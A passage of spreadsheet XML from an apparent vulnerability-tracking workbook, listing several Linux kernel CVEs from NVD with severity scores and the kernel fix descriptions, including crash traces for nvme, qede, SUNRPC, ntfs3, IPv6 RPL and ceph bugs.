      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr"/>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: zero the discard fallback page
nvme_setup_discard() always maps sizeof(struct nvme_dsm_range) *
NVME_DSM_MAX_RANGES = 4096 bytes as the DSM payload however many ranges
the command declares, because some devices ignore the 'Number of Ranges'
field - the Fixes: commit records two that read past the declared ranges.
A single-range discard fills only the first 16 bytes.
Normally the buffer comes from kzalloc() and the other 4080 bytes are
zero.  When that allocation fails the code falls back to the
per-controller ctrl-&gt;discard_page, which nvme_init_ctrl() obtains with
alloc_page(GFP_KERNEL) and nothing ever zeroes, so those 4080 bytes are
whatever the page last held and are handed to the controller.  Reaching
it requires the kzalloc(GFP_ATOMIC | __GFP_NOWARN) to fail, that is
memory pressure; it is not remotely triggerable.  Failing the allocation
under KMSAN reproduces it, with the leaked tail full of vmemmap struct
page pointers.  The extent in the report is a partial transfer of the
payload, not the whole 4096 bytes; the 16-byte boundary in it is the one
declared range:
[   11.991601] BUG: KMSAN: uninit-value in dma_map_phys+0x14c8/0x1900
[   11.991969]  dma_map_phys+0x14c8/0x1900
[   11.992220]  dma_map_page_attrs+0xcf/0x130
[   11.992485]  e1000_xmit_frame+0x4099/0x6d10
[   11.992768]  dev_hard_start_xmit+0x22f/0xa80
[   11.993068]  sch_direct_xmit+0x35c/0xcb0
[   11.993315]  __dev_queue_xmit+0x1ee5/0x5eb0
[   11.993608]  ip_finish_output2+0x1903/0x1c30
[   11.993881]  ip_finish_output+0x288/0x870
[   11.994125]  ip_output+0x15e/0x400
[   11.994365]  __ip_queue_xmit+0x1e85/0x1fb0
[   11.994639]  ip_queue_xmit+0x60/0x80
[   11.994899]  __tcp_transmit_skb+0x4e71/0x5fa0
[   11.995210]  tcp_write_xmit+0x3a36/0x9160
[   11.995533]  __tcp_push_pending_frames+0xc5/0x3c0
[   11.995854]  tcp_push+0x7dc/0x840
[   11.996076]  tcp_sendmsg_locked+0x766c/0x8400
[   11.996371]  tcp_sendmsg+0x4b/0x90
[   11.996572]  inet_sendmsg+0x134/0x2a0
[   11.996823]  __sock_sendmsg+0x265/0x360
[   11.997076]  sock_sendmsg+0x100/0x1e0
[   11.997293]  nvme_tcp_try_send+0x196f/0x6370
[   11.997605]  nvme_tcp_queue_rq+0x1d54/0x20b0
[   11.997882]  blk_mq_dispatch_rq_list+0x5ee/0x2e50
[   11.998175]  __blk_mq_sched_dispatch_requests+0x16dc/0x24a0
[   11.998539]  blk_mq_sched_dispatch_requests+0x11b/0x2c0
[   11.998865]  blk_mq_run_work_fn+0x13b/0x280
[   11.999146]  process_scheduled_works+0x966/0x1ad0
[   11.999465]  worker_thread+0xe44/0x1480
[   11.999709]  kthread+0x53b/0x600
[   11.999927]  ret_from_fork+0x29f/0x7c0
[   12.000191]  ret_from_fork_asm+0x1a/0x30
[   12.000460]
[   12.000558] Uninit was created at:
[   12.000788]  __alloc_frozen_pages_noprof+0x8bf/0xd30
[   12.001096]  alloc_pages_mpol+0x1d0/0x5f0
[   12.001326]  alloc_pages_noprof+0x102/0x290
[   12.001627]  nvme_init_ctrl+0x5a3/0x9f0
[   12.001891]  nvme_tcp_create_ctrl+0xd75/0x19b0
[   12.002170]  nvmf_dev_write+0x4c68/0x4fd0
[   12.002426]  vfs_write+0x587/0x1a10
[   12.002636]  __x64_sys_write+0x207/0x4f0
[   12.002874]  x64_sys_call+0x2ff0/0x3ea0
[   12.003123]  do_syscall_64+0x147/0x3b0
[   12.003400]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[   12.003680]
[   12.003777] Bytes 16-2843 of 2844 are uninitialized
[   12.004068] Memory access of size 2844 starts at ffff888109f82000
[   12.004412]
[   12.004530] CPU: 0 UID: 0 PID: 101 Comm: kworker/0:1H Not tainted 7.2.0-rc5-NVMECTL-gf5098b6bae76 #1 PREEMPT(lazy)
[   12.005127] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   12.005762] Workqueue: kblockd blk_mq_run_work_fn
[   12.006073] =====================================================
Allocate the page with __GFP_ZERO.  The single allocation site covers
every use of it: bytes no discard has written stay zero, and bytes one
did write hold that controller's own range list, which it has already
been sent.</t>
        </is>
      </c>
      <c r="S493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89483</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89511</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr"/>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
qede: Fix NULL pointer dereference in TPA fragment processing
Under memory pressure, the qede driver encounters NULL pointer
dereferences when processing TPA continuation fragments.
Commit 8a8633978b84 ("qede: Add build_skb() support.") accidentally
dropped the assignment of tpa_info-&gt;buffer.data in qede_tpa_start().
When memory pressure causes an SKB allocation failure in qede_tpa_start(),
the driver sets tpa_start_fail = true and attempts to recycle the physical
page later in qede_tpa_end() via qede_reuse_page(). However, because
buffer.data was left uninitialized (NULL), qede_reuse_page() pushes a
"ghost" BD (valid DMA mapping but NULL data pointer) back into the
active Rx ring.
The next time the hardware uses this ring slot, it passes a NULL page
to qede_fill_frag_skb(), causing a kernel panic.
Example crash from production system:
 BUG: unable to handle kernel NULL pointer dereference at 0x8
 RIP: qede_fill_frag_skb+0x96/0x430 [qede]
 Call Trace:
   qede_rx_int+0xb06/0x1de0
   qede_poll+0x2f4/0x6c0
   __napi_poll+0x2d/0x130
Fix the root cause by restoring the tpa_info-&gt;buffer.data assignment
in qede_tpa_start(), ensuring valid pages are correctly tracked and
recycled. Additionally, update the stale comment for
struct qede_agg_info::buffer to reflect its current usage.</t>
        </is>
      </c>
      <c r="S494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89511</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89528</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr"/>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Reject Read lists that exceed the page budget
Individual Read segment lengths are validated at decode time, but
nothing prevents a requester from sending multiple segments whose
cumulative length exceeds the rq_pages array budget. When one
segment fills the page array exactly, the runtime guard in
svc_rdma_build_read_segment() is bypassed because len reaches zero.
A subsequent segment then accesses the NULL sentinel slot at
rq_pages[rq_maxpages], resulting in a NULL pointer dereference during
DMA mapping.
Accumulate pages across all Read segments and reject the message at
decode time when the total would overflow the page budget.</t>
        </is>
      </c>
      <c r="S495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89528</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89544</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr"/>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: fix gssx_dec_option_array error path bugs
Four coupled defects in the gssx XDR option-array decoder make the
error paths unsafe: a NULL deref in the caller, a refcount leak on
the decoded group_info, and a latent use-after-free that the leak
fix would otherwise expose.
gssx_dec_option_array() sets oa-&gt;count = 1 before allocating
oa-&gt;data.  If that allocation fails, -ENOMEM is returned with
oa-&gt;count == 1 and oa-&gt;data == NULL.  All other error paths jump
to free_oa: which frees oa-&gt;data and NULLs it but also leaves
oa-&gt;count == 1.  The caller trusts the count:
    gssp_accept_sec_context_upcall()
      gssx_dec_accept_sec_context()
        gssx_dec_option_array()        /* fails, count=1 data=NULL */
      data = res.options.data[0].value /* NULL deref */
Independently, free_creds: releases the partially decoded svc_cred
with a bare kfree(creds).  gssx_dec_linux_creds() installs a
groups_alloc() result into creds-&gt;cr_group_info; that object is
kvmalloc-backed and refcounted, and only put_group_info() reaches
kvfree().  A plain kfree(creds) drops the wrapper and leaks the
group_info allocation.
The natural fix for the leak is to call free_svc_cred(creds) before
kfree(creds), but free_svc_cred() invokes put_group_info() on
creds-&gt;cr_group_info unconditionally when non-NULL.  The existing
out_free_groups: path in gssx_dec_linux_creds() already called
groups_free() on that pointer without clearing it, so once
free_svc_cred() is wired in, the subsequent put_group_info() would
touch freed memory.
Fix all four together:
  - Move the oa-&gt;count = 1 assignment below the oa-&gt;data allocation
    so it is never set when oa-&gt;data is NULL.
  - Reset oa-&gt;count to 0 at free_oa: so count and data stay
    coherent and the caller sees an empty option array.
  - Call free_svc_cred(creds) before kfree(creds) at free_creds:
    so the refcounted cr_group_info is released.  free_svc_cred()
    either NULL-guards each field explicitly (cr_group_info has
    an if() check) or delegates to a helper that is NULL-safe
    itself (kfree for the string fields, gss_mech_put() which
    guards with if(gm) at gss_mech_switch.c:342), so it is safe
    to call on a partially decoded svc_cred where only
    cr_uid/cr_gid/cr_group_info have been written and everything
    else is zero from kzalloc.
  - In gssx_dec_linux_creds()'s out_free_groups: path, release
    cr_group_info with put_group_info() rather than groups_free()
    so the teardown matches free_svc_cred()'s refcount-aware path,
    and clear the pointer so a later free_svc_cred() on the same
    creds does not release it a second time.</t>
        </is>
      </c>
      <c r="S496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89544</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89549</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr"/>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunrpc: route to a populated pool in svc_pool_for_cpu()
svc_set_num_threads() spreads the requested threads evenly across the
service's pools (base = nrservs / sv_nrpools).  When a service runs
fewer threads than it has pools -- e.g. an nfsd configured with fewer
threads than the host has NUMA nodes while running in "pernode" or
"percpu" mode -- the trailing pools are left with no threads at all.
svc_xprt_enqueue() selects a pool from the CPU servicing the transport,
queues the transport on that pool's sp_xprts, and only wakes a thread
from the same pool.  Each thread services exclusively its own pool, so a
transport that lands on a threadless pool is enqueued on sp_xprts and
never picked up: the connection hangs indefinitely.
Have svc_pool_for_cpu() skip pools that currently have no threads,
falling back to the next populated pool.  This trades NUMA locality for
a guarantee that the work is actually serviced.  sp_nrthreads is only
updated under the service mutex; the lockless read here is a best-effort
routing hint, so annotate it with data_race().</t>
        </is>
      </c>
      <c r="S497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89549</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89561</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr"/>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: rpl: fix NULL dereference of idev in ipv6_rpl_srh_rcv()
ipv6_rpl_srh_rcv() dereferences idev from __in6_dev_get() without a NULL
check when reading idev-&gt;cnf.rpl_seg_enabled.
When the device's MTU drops below IPV6_MIN_MTU, addrconf_ifdown() clears
dev-&gt;ip6_ptr through RCU_INIT_POINTER(). A packet that passed the idev
check in ip6_rcv_core() can then reach ipv6_rpl_srh_rcv() with
dev-&gt;ip6_ptr already NULL.
Reproduced by flooding the receiving interface with ping6 traffic while
flapping its MTU between 1500 and 1200:
 BUG: KASAN: null-ptr-deref in ipv6_rpl_srh_rcv+0xb3/0x1070
 Read of size 4 at addr 00000000000006b4 by task ping6/394
 CPU: 2 UID: 0 PID: 394 Comm: ping6 Not tainted 7.2.0-rc7-micro-vm-dev-00095-g24ef02f934ee #240 PREEMPT(full)
 Call Trace:
  &lt;IRQ&gt;
  kasan_report+0xc6/0x100
  ipv6_rpl_srh_rcv+0xb3/0x1070
  ip6_protocol_deliver_rcu+0x759/0x9a0
  ip6_input_finish+0xa8/0x1b0
  ip6_input+0xe1/0x490
  ipv6_rcv+0x33d/0x460
  __netif_receive_skb_one_core+0xd6/0x130
  process_backlog+0x2cc/0xa00
  __napi_poll.constprop.0+0x56/0x270
  net_rx_action+0x327/0x730
  handle_softirqs+0x11e/0x630
  do_softirq+0xb3/0xf0
  &lt;/IRQ&gt;
Both ipv6_rpl_srh_rcv() and ipv6_srh_rcv() are called only from
ipv6_rthdr_rcv(), which already has an idev lookup.
Fix the NULL dereference on the RPL path by checking idev in
ipv6_rthdr_rcv(), before it calls either function. The callees take idev as
an argument and no longer call __in6_dev_get(), so the packet is now
dropped in one place, with SKB_DROP_REASON_IPV6DISABLED on both paths.</t>
        </is>
      </c>
      <c r="S498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89561</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89616</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr"/>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: fix info-leak on partial LZNT decompress in ni_read_frame()
ni_read_frame() decompresses an LZNT $DATA frame into the vmapped target
pages and then trusts decompress_lznt()'s return value:
  unc_size = decompress_lznt(frame_ondisk, ondisk_size, frame_mem,
                             frame_size);
  if ((ssize_t)unc_size &lt; 0)        err = unc_size;
  else if (!unc_size || unc_size &gt; frame_size)  err = -EINVAL;
decompress_lznt() stops as soon as the compressed stream is exhausted
(e.g. a zero chunk header) and returns the number of bytes it actually
wrote, which may be far less than frame_size. The bytes between unc_size
and frame_size are never written. The only memset() that follows zeroes
the region beyond i_valid; when the frame lies entirely within the file's
valid size that memset() does not run, so the gap retains whatever was in
the just-vmapped pages. All pages are then marked uptodate and returned
to userspace, disclosing uninitialized (recently-freed) kernel page
memory. A crafted compressed file whose stream decompresses to only a few
bytes leaks the remainder of every frame on a plain read(2), which is
enough to recover kernel pointers and defeat KASLR.
Zero the [unc_size, frame_size) tail immediately after a successful LZNT
decompress so the remainder reads back as zero.</t>
        </is>
      </c>
      <c r="S499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89616</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89647</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr"/>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: do not repeat ceph_trim_dentries() if no progress possible
ceph_cap_reclaim_work() re-queues itself for as long as
ceph_trim_dentries() returns -EAGAIN, which happens whenever a lease
walk exhausts its `nr_to_scan` budget.  This creates a busy loop that
consumes CPU without making any progress when there is nothing to
reclaim: with no cap pressure (`count==0`) and every scanned lease
still valid, each pass runs the full scan budget down to zero and
returns `-EAGAIN`, only to be queued again immediately.
The dir-lease walk made this worse.  When `expire_dir_lease` is
`false` (i.e. we have no intention of reclaiming dir leases),
__dir_lease_check() returned `TOUCH` for every valid lease.  `TOUCH`
moves the dentry to the tail of the list and resets `di-&gt;time` via
__dentry_dir_lease_touch(), so a walk over N valid leases pointlessly
rewrote the list, refreshed the timestamps (preventing them from ever
aging out) and always drained `nr_to_scan`, guaranteeing the `-EAGAIN`
requeue.
Fix this in three steps:
 - Return `KEEP` instead of `TOUCH` when `expire_dir_lease` is
   `false`.  If we are not going to reclaim the lease, leave it in
   place instead of churning the list and resetting its timestamp; the
   walk then terminates naturally (or via `STOP` at the first fresh
   lease).
 - Only return `-EAGAIN` from the first (dentry-lease) walk when something
   was actually freed.  A full batch that frees nothing means retrying
   the same list immediately is futile; fall through to the dir-lease
   walk instead.
 - After both walks, bail out with success (0) when nothing was freed
   and there is no cap pressure (`count==0`).  There is no reason to
   keep retrying when we are not over the cap limit and made no
   progress.
Under real cap pressure (`count&gt;0`) the reclaim path is unchanged and
still retries via `-EAGAIN`.
Without this patch, I saw 500 ceph_trim_dentries() calls per second on
our web servers.  This is very visible in `/proc/lock_stat` (5 minute
capture):
              class name    con-bounces    contentions   waittime-min   waittime-max waittime-total   waittime-avg    acq-bounces   acquisitions   holdtime-min   holdtime-max holdtime-total   holdtime-avg
 &amp;mdsc-&gt;dentry_list_lock:        126180         128218           0.04        8063.44    15986965.20         124.69        1573354        5296812           0.04        8291.28    74164526.48          14.00
 -----------------------
 &amp;mdsc-&gt;dentry_list_lock         111736          [&lt;000000007b11e319&gt;] __ceph_dentry_dir_lease_touch+0x7c/0xa8
 &amp;mdsc-&gt;dentry_list_lock           2631          [&lt;0000000050597999&gt;] __dentry_leases_walk+0x64/0x2c8
 &amp;mdsc-&gt;dentry_list_lock           3878          [&lt;00000000c0022f62&gt;] __ceph_dentry_lease_touch+0x5c/0xa8
 &amp;mdsc-&gt;dentry_list_lock           9973          [&lt;000000002f27cb6f&gt;] __dentry_lease_unlist+0x50/0xa0
 -----------------------
 &amp;mdsc-&gt;dentry_list_lock         123621          [&lt;0000000050597999&gt;] __dentry_leases_walk+0x64/0x2c8
 &amp;mdsc-&gt;dentry_list_lock           1822          [&lt;000000007b11e319&gt;] __ceph_dentry_dir_lease_touch+0x7c/0xa8
 &amp;mdsc-&gt;dentry_list_lock           2720          [&lt;000000002f27cb6f&gt;] __dentry_lease_unlist+0x50/0xa0
 &amp;mdsc-&gt;dentry_list_lock             55          [&lt;00000000c0022f62&gt;] __ceph_dentry_lease_touch+0x5c/0xa8
With this patch:
              class name    con-bounces    contentions   waittime-min   waittime-max waittime-total   waittime-avg    acq-bounces   acquisitions   holdtime-min   holdtime-max holdtime-total   holdtime-avg
 &amp;mdsc-&gt;dentry_list_lock:          1203           1215           0.16         408.88       33082.88          27.23        4320501        7357389           0.04         500.64     1961578.00           0.27
 -----------------------
 &amp;mdsc-&gt;dentry_list_lock           1029          [&lt;000000003c9aea8a&gt;] __ceph_dentry_dir_lease_touch+0x7c/0xa8
 &amp;mdsc-&gt;dentry_list_lock            1
---truncated---</t>
        </is>
      </c>
      <c r="S500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89647</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89648</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr"/>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: cap delegated inode count in ceph_parse_deleg_inos()
ceph_parse_deleg_inos() decodes interval sets of delegated inode numbers
from an MDS create-with-delegation reply. For each set it reads a 64-bit
start and a 64-bit len with ceph_decode_64_safe(), which only validates
that the eight bytes are present in the message, not the value, and then
loops over len while inserting entries into s_delegated_inos.
len is fully attacker controlled. A malicious or compromised MDS can send
one huge interval, many intervals in one reply, duplicate intervals, or
repeated replies that accumulate delegated inodes on the same session.
The original code bounded none of these and could spin the insert loop or
grow the xarray without limit.
Bound both dimensions with a single enforcement point. Track the number
of delegated inodes held by each MDS session in an atomic counter and
grow it only in ceph_insert_deleg_ino(), which uses atomic_add_unless()
to refuse to push the count past CEPH_MAX_DELEG_INOS. Because that helper
is the only place the counter grows, the per-session population can never
exceed the cap, so no separate per-session pre-check is needed. The
counter is decremented when async create consumes a delegated inode or
when an insert fails, incremented when a delegated inode is restored,
initialized with the session xarray, and reset when reconnect destroys
the xarray.
A per-session cap alone still lets one reply spin the insert loop on
duplicate ranges without growing the counter, so also cap the aggregate
interval length accepted from a single reply. Together these bound both
the loop trip count per reply and the xarray population across replies.
The cap is a fixed, client-chosen constant rather than a value derived
from the MDS. mds_client_prealloc_inos is a userspace MDS configuration
option; it is never sent to the kernel client on the wire, and a
server-supplied bound could not be trusted for a defensive limit in any
case. The constant is set well above that option's documented default of
1000 (a generous multiple), so legitimate refill behavior is unaffected
while the CPU and xarray memory a malformed delegation stream can consume
stays bounded.
Impact: a malicious or compromised Ceph MDS can no longer make a client
spin through an unbounded delegated-inode interval or grow one session's
delegated-inode xarray without limit.</t>
        </is>
      </c>
      <c r="S501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89648</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
